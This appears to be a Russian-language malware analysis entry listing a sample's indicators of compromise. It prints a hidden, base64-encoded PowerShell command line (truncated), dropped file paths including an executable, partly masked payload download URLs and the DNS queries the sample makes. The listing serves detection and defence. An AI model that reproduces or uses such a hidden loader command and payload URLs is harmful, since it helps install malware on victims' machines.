Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABGAHkAcwB3AG8AagBqAHUAZgB0AGMAbAA9ACcAUwB1AGQAbgB2AGQAcABqAGgAJwA7ACQAVgBzAHAAeAB4AHkAcwBtAGoAbQBlACAAPQAgACcAMQA0ADMAJwA7ACQAWgBlAHgAbAB0AGgAeQB3AGsAcgBhAHU...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\143.exe
- http://wi####aintinc.com/wp-includes/hjwd1my2/
- http://pr#####tautosales.com/wp-content/xtc67oa524/
- http://jo####ben2.store/cgi-bin/s308bq67/
- DNS ASK ja###ulpro.com
- DNS ASK wi####aintinc.com
- DNS ASK ag###ama.xyz
- DNS ASK pr#####tautosales.com
- DNS ASK jo####ben2.store